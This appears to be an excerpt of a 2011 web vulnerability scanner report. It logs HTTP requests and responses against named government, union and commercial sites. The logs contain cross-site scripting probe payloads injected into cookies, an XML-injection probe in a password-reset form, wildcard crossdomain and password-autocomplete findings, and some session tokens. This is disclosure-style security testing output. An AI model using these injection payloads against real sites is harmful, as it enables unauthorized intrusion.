| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:14:48 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/works/resources |
| GET /ada/works/resources Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en547b0"%3balert(1)/ |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:14:53 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... <!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN547B0";ALERT(1)/ ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /favicon.ico |
| GET /favicon.ico HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: TEST=1; SYSTRANLANGUAGE=en53fa7"><img%20src%3da |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:28:25 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /favicon.ico |
| GET /favicon.ico HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: TEST=1; SYSTRANLANGUAGE=en8c6ff"%3balert(1)/ |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:28:27 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... <!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN8C6FF";ALERT(1)/ ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.vsea.org |
| Path: | /crossdomain.xml |
| GET /crossdomain.xml HTTP/1.0 Host: www.vsea.org |
| HTTP/1.1 200 OK Date: Fri, 29 Apr 2011 22:12:52 GMT Server: Apache/2.2.9 (Debian) mod_fastcgi/2.4.6 mod_fcgid/2.3.5 mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0 Last-Modified: Tue, 18 Nov 2008 21:21:25 GMT ETag: "1dcc26-6d-45bfd47205f40" Accept-Ranges: bytes Content-Length: 109 Cache-Control: max-age=1209600 Expires: Fri, 13 May 2011 22:12:52 GMT Vary: User-Agent Connection: close Content-Type: application/xml <cross-domain-policy> <allow-access-from domain="*"/> <allow-access-from domain="*"/> </cross-domain-policy> |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://data.ok.gov |
| Path: | /Public-Safety-And |
| GET /Public-Safety-And Host: data.ok.gov Proxy-Connection: keep-alive Referer: http://data.ok.gov/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=120904477 |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 11:22:45 GMT Server: Apache ETag: "11bf9c3a3a6c0c13333 Cache-Control: private, max-age=0, must-revalidate Set-Cookie: logged_in=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT Set-Cookie: _blist_session_id=%7C Status: 200 Vary: Accept-Encoding,User Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 85997 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <!--[if lte IE 7]> <html xmlns="http://www.w3.org ...[SNIP]... </div> <form action="/user_sessions" class="commonForm" id="new_user_session" method="post"><div style="margin:0;padding:0 ...[SNIP]... </label> <input autocomplete="off" id="user_session_password </div> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://data.ok.gov |
| Path: | /Public-Safety-And |
| GET /Public-Safety-And Host: data.ok.gov Proxy-Connection: keep-alive Referer: http://data.ok.gov/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=120904477 |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 11:22:45 GMT Server: Apache ETag: "11bf9c3a3a6c0c13333 Cache-Control: private, max-age=0, must-revalidate Set-Cookie: logged_in=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT Set-Cookie: _blist_session_id=%7C Status: 200 Vary: Accept-Encoding,User Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 85997 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <!--[if lte IE 7]> <html xmlns="http://www.w3.org ...[SNIP]... </h2> <form action="/account" class="commonForm" enctype="multipart/form ...[SNIP]... </label> <input autocomplete="off" id="signup_password" name="signup[password]" size="30" type="password" /> </div> ...[SNIP]... </label> <input autocomplete="off" id="signup_passwordC </div> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://digg.com |
| Path: | /submit |
| GET /submit HTTP/1.1 Host: digg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 12:20:08 GMT Server: Apache X-Powered-By: PHP/5.2.9-digg8 Cache-Control: no-cache,no-store,must Pragma: no-cache Set-Cookie: traffic_control= Set-Cookie: d=812aa8e869f0d2e7c8 X-Digg-Time: D=24701 10.2.129.157 Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 8171 <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>Digg - Submit a link </title> <meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics ...[SNIP]... </script><form class="hidden"> <input type="text" name="ident" value="" id="ident-saved"> <input type="password" name="password" value="" id="password-saved"> </form> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://myflorida.custhelp |
| Path: | /cgi-bin/myflorida.cfg |
| GET /cgi-bin/myflorida.cfg Host: myflorida.custhelp.com Proxy-Connection: keep-alive Referer: http://myflorida.custhelp User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=162278755 |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 01:02:09 GMT Server: Apache P3P: policyref="http:/ RNT-Time: D=141245 t=1304125329844119 RNT-Machine: 05 Vary: Accept-Encoding X-Cnection: close Content-Type: text/html; charset=UTF-8 Content-Length: 18271 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html lang="en_US"> <!-- Head ->>>>>>>>>>>>>>>>>>>>>>>> ...[SNIP]... </tr> <form class="minimal" name="_validate" method="post" action="acct_login_submit <input type="hidden" name="p_sid" value="ql-ywKsk" /> ...[SNIP]... <td><input name="p_passwd" id="p_passwd" type="password" size="20" maxlength="20" /></td> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://pa.gov |
| Path: | /portal/server.pt |
| POST /portal/server.pt? HTTP/1.1 Host: pa.gov Proxy-Connection: keep-alive Referer: http://pa.gov/portal Cache-Control: max-age=0 Origin: http://pa.gov User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: plloginoccured=false; REQUESTURLBEFORESSO=; ptLastLoginAuthSource= Content-Length: 128 in_hi_space=Login&in_hi |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 12:39:45 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Content-Language: en Set-Cookie: ASP.NET_SessionId Expires: 1304080785543 Cache-Control: no-store, no-cache, must-revalidate, max-age=0, post-check=0, pre-check=0 Last-Modified: 1304167185543 Content-Type: text/html; charset=utf-8 Content-Length: 34484 <html> <head><link type="text/css" href="http://www.portal ...[SNIP]... </table> <form method="post" action="http://pa.gov ...[SNIP]... <td align="left" width="60%" colspan="1" class="loginText"><input type="password" alt="Password:" size="30" class="formInputBoxText" name="in_pw_userpass" id="pt-login-password ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.alabama.gov |
| Path: | /portal/index.jsp |
| GET /portal/index.jsp HTTP/1.1 Host: www.alabama.gov Proxy-Connection: keep-alive Referer: http://al.gov/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 00:36:24 GMT Server: Apache/1.3.41 (Unix) Resin/3.0.25 Cache-Control: private Set-Cookie: JSESSIONID=abcI5QvmC Content-Type: text/html Content-Length: 34756 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equ ...[SNIP]... <noscript><form action='http://www ...[SNIP]... <p> password:<input type="password" name="login_password" id="login_password" value="" /> </p> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.visitflorida |
| Path: | /floridalive |
| GET /floridalive HTTP/1.1 Host: www.visitflorida.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 01:02:39 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.3.4 Set-Cookie: PHPSESSID=nf9dmcfmtu Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 465042 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <div id="loginPanel"> <form action="/login/section <div class="username"> ...[SNIP]... </label><input type="password" class="empty" name="password" id="password" size="20" /></div> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.vsea.org |
| Path: | / |
| GET / HTTP/1.1 Host: www.vsea.org Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Date: Fri, 29 Apr 2011 22:12:49 GMT Server: Apache/2.2.9 (Debian) mod_fastcgi/2.4.6 mod_fcgid/2.3.5 mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0 X-Powered-By: PHP/5.2.6-1+lenny9 Expires: Sun, 19 Nov 1978 05:00:00 GMT Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0 Set-Cookie: SESSc2e79101469fa43c Last-Modified: Fri, 29 Apr 2011 22:12:49 GMT Vary: User-Agent,Accept Content-Type: text/html; charset=utf-8 Content-Length: 45383 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Ver ...[SNIP]... <div class="content"> <form action="/node?destination <div> ...[SNIP]... </label> <input type="password" name="pass" id="edit-pass" maxlength="60" size="15" class="form-text required" /> </div> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.vsea.org |
| Path: | /editorial-lays-out |
| GET /editorial-lays-out Host: www.vsea.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SESSc2e79101469fa43c |
| HTTP/1.1 404 Not Found Date: Sat, 30 Apr 2011 12:41:34 GMT Server: Apache/2.2.9 (Debian) mod_fastcgi/2.4.6 mod_fcgid/2.3.5 mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0 X-Powered-By: PHP/5.2.6-1+lenny9 Expires: Sun, 19 Nov 1978 05:00:00 GMT Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0 Last-Modified: Sat, 30 Apr 2011 12:41:34 GMT Vary: User-Agent,Accept Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 31824 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Pag ...[SNIP]... <div class="content"> <form action="/?destination <div> ...[SNIP]... </label> <input type="password" name="pass" id="edit-pass" maxlength="60" size="15" class="form-text required" /> </div> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.vsea.org |
| Path: | /favicon.ico |
| GET /favicon.ico HTTP/1.1 Host: www.vsea.org Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: SESSc2e79101469fa43c |
| HTTP/1.1 404 Not Found Date: Sat, 30 Apr 2011 01:22:40 GMT Server: Apache/2.2.9 (Debian) mod_fastcgi/2.4.6 mod_fcgid/2.3.5 mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0 X-Powered-By: PHP/5.2.6-1+lenny9 Expires: Sun, 19 Nov 1978 05:00:00 GMT Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0 Last-Modified: Sat, 30 Apr 2011 01:22:40 GMT Vary: User-Agent,Accept Content-Type: text/html; charset=utf-8 Content-Length: 31785 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Pag ...[SNIP]... <div class="content"> <form action="/?destination <div> ...[SNIP]... </label> <input type="password" name="pass" id="edit-pass" maxlength="60" size="15" class="form-text required" /> </div> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.vsea.org |
| Path: | /join-vsea |
| GET /join-vsea HTTP/1.1 Host: www.vsea.org Proxy-Connection: keep-alive Referer: http://www.vsea.org/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: SESSc2e79101469fa43c |
| HTTP/1.1 200 OK Date: Fri, 29 Apr 2011 22:13:10 GMT Server: Apache/2.2.9 (Debian) mod_fastcgi/2.4.6 mod_fcgid/2.3.5 mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0 X-Powered-By: PHP/5.2.6-1+lenny9 Expires: Sun, 19 Nov 1978 05:00:00 GMT Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0 Last-Modified: Fri, 29 Apr 2011 22:13:11 GMT Vary: User-Agent,Accept Content-Type: text/html; charset=utf-8 Content-Length: 34231 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Joi ...[SNIP]... <div class="content"> <form action="/join-vsea <div> ...[SNIP]... </label> <input type="password" name="pass" id="edit-pass" maxlength="60" size="15" class="form-text required" /> </div> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.vsea.org |
| Path: | /join-your-union |
| GET /join-your-union HTTP/1.1 Host: www.vsea.org Proxy-Connection: keep-alive Referer: http://www.vsea.org/join User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: SESSc2e79101469fa43c |
| HTTP/1.1 200 OK Date: Fri, 29 Apr 2011 22:13:24 GMT Server: Apache/2.2.9 (Debian) mod_fastcgi/2.4.6 mod_fcgid/2.3.5 mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0 X-Powered-By: PHP/5.2.6-1+lenny9 Expires: Sun, 19 Nov 1978 05:00:00 GMT Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0 Last-Modified: Fri, 29 Apr 2011 22:13:24 GMT Vary: User-Agent,Accept Content-Type: text/html; charset=utf-8 Content-Length: 39482 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Joi ...[SNIP]... <div class="content"> <form action="/join-your-union <div> ...[SNIP]... </label> <input type="password" name="pass" id="edit-pass" maxlength="60" size="15" class="form-text required" /> </div> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.vsea.org |
| Path: | /maine-study-finds-state |
| GET /maine-study-finds-state Host: www.vsea.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SESSc2e79101469fa43c |
| HTTP/1.1 404 Not Found Date: Sat, 30 Apr 2011 12:41:34 GMT Server: Apache/2.2.9 (Debian) mod_fastcgi/2.4.6 mod_fcgid/2.3.5 mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0 X-Powered-By: PHP/5.2.6-1+lenny9 Expires: Sun, 19 Nov 1978 05:00:00 GMT Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0 Last-Modified: Sat, 30 Apr 2011 12:41:34 GMT Vary: User-Agent,Accept Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 31818 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Pag ...[SNIP]... <div class="content"> <form action="/?destination <div> ...[SNIP]... </label> <input type="password" name="pass" id="edit-pass" maxlength="60" size="15" class="form-text required" /> </div> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.vsea.org |
| Path: | /node |
| GET /node HTTP/1.1 Host: www.vsea.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SESSc2e79101469fa43c |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 12:41:34 GMT Server: Apache/2.2.9 (Debian) mod_fastcgi/2.4.6 mod_fcgid/2.3.5 mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0 X-Powered-By: PHP/5.2.6-1+lenny9 Expires: Sun, 19 Nov 1978 05:00:00 GMT Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0 Last-Modified: Sat, 30 Apr 2011 12:41:34 GMT Vary: User-Agent,Accept Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 45387 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Ver ...[SNIP]... <div class="content"> <form action="/node?destination <div> ...[SNIP]... </label> <input type="password" name="pass" id="edit-pass" maxlength="60" size="15" class="form-text required" /> </div> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.vsea.org |
| Path: | /purchase-vsea-clothing |
| GET /purchase-vsea-clothing HTTP/1.1 Host: www.vsea.org Proxy-Connection: keep-alive Referer: http://www.vsea.org/join User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: SESSc2e79101469fa43c |
| HTTP/1.1 200 OK Date: Fri, 29 Apr 2011 22:13:49 GMT Server: Apache/2.2.9 (Debian) mod_fastcgi/2.4.6 mod_fcgid/2.3.5 mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0 X-Powered-By: PHP/5.2.6-1+lenny9 Expires: Sun, 19 Nov 1978 05:00:00 GMT Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0 Last-Modified: Fri, 29 Apr 2011 22:13:49 GMT Vary: User-Agent,Accept Content-Type: text/html; charset=utf-8 Content-Length: 32798 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Pur ...[SNIP]... <div class="content"> <form action="/purchase-vsea <div> ...[SNIP]... </label> <input type="password" name="pass" id="edit-pass" maxlength="60" size="15" class="form-text required" /> </div> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.vsea.org |
| Path: | /state-hospital%26%23039 |
| GET /state-hospital%26%23039 HTTP/1.1 Host: www.vsea.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SESSc2e79101469fa43c |
| HTTP/1.1 404 Not Found Date: Sat, 30 Apr 2011 12:41:40 GMT Server: Apache/2.2.9 (Debian) mod_fastcgi/2.4.6 mod_fcgid/2.3.5 mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0 X-Powered-By: PHP/5.2.6-1+lenny9 Expires: Sun, 19 Nov 1978 05:00:00 GMT Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0 Last-Modified: Sat, 30 Apr 2011 12:41:40 GMT Vary: User-Agent,Accept Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 31800 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Pag ...[SNIP]... <div class="content"> <form action="/?destination <div> ...[SNIP]... </label> <input type="password" name="pass" id="edit-pass" maxlength="60" size="15" class="form-text required" /> </div> ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Tentative |
| Host: | http://us.mcafee.com |
| Path: | /root/basket.asp |
| GET /root/basket.asp HTTP/1.1 Host: us.mcafee.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_ev8=%5B%5B%27mcafee%27 |
| HTTP/1.1 500 Internal Server Error Date: Fri, 29 Apr 2011 21:27:13 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 5550 Content-Type: text/html Expires: Thu, 28 Apr 2011 21:27:13 GMT Set-Cookie: lUsrCtxSession= Set-Cookie: langid=1; domain=mcafee.com; path=/ Set-Cookie: ASPSESSIONIDQSSSBDBD Cache-control: private Connection: close <html> <head> <title> McAfee Security</title> <meta http-equiv="Content-Type" content="text/html"> <link rel="stylesheet" type="text/css" href="/common/stylesheets <script language= ...[SNIP]... <?xml version="1.0" encoding="iso-8859-1"?> ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Tentative |
| Host: | http://us.mcafee.com |
| Path: | /root/basket.asp |
| GET /root/basket.asp?affid=0& HTTP/1.1 Host: us.mcafee.com Proxy-Connection: keep-alive Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: SessionInfo=AffiliateId=0 |
| HTTP/1.1 500 Internal Server Error Date: Fri, 29 Apr 2011 21:31:25 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 5550 Content-Type: text/html Expires: Thu, 28 Apr 2011 21:31:25 GMT Set-Cookie: ASPSESSIONIDQQQQBDAD Cache-control: private <html> <head> <title> McAfee Security</title> <meta http-equiv="Content-Type" content="text/html"> <link rel="stylesheet" type="text/css" href="/common/stylesheets <script language= ...[SNIP]... <?xml version="1.0" encoding="iso-8859-1"?> ...[SNIP]... |
| Severity: | Medium |
| Confidence: | Tentative |
| Host: | https://www.vermontj |
| Path: | /ada/mn_forgotpass.cfm |
| POST /ada/mn_forgotpass.cfm Host: www.vermontjoblink.com Connection: keep-alive Referer: https://www.vermontj Cache-Control: max-age=0 Origin: https://www.vermontj User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf Content-Length: 613 usvuserid=]]>>&usvuserid_ADAdefault= ...[SNIP]... |
